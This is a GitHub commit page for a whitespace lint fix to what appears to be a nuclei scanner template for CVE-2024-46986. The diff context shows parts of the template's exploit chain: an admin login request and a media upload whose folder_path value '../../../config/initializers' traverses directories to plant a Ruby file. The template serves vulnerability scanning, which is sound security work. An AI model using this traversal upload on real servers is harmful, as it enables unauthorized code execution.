Skip to content

Commit

Permalink
fix-lint-error
Browse files Browse the repository at this point in the history
  • Loading branch information
DhiyaneshGeek authored Sep 26, 2024
1 parent 4d20b7d commit 7dd2833
Showing 1 changed file with 3 additions and 3 deletions.
6 changes: 3 additions & 3 deletions http/cves/2024/CVE-2024-46986.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -48,7 +48,7 @@ http:
- 'name="authenticity_token" value="(.*?)"'

- raw:
- |-
- |
POST /admin/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Expand All @@ -63,7 +63,7 @@ http:
internal: true

- raw:
- |
- |
POST /admin/media/upload?actions=false HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data;boundary=----WebKitFormBoundarynJs8ffRP2MgQXiF8
Expand All @@ -87,7 +87,7 @@ http:
- type: word
part: body
words:
- '{"name":"{{filename}}.rb","folder_path":"../../../config/initializers"'
- '{"name":"{{filename}}.rb","folder_path":"../../../config/initializers"'
internal: true

- raw:
Expand Down

0 comments on commit 7dd2833

Please sign in to comment.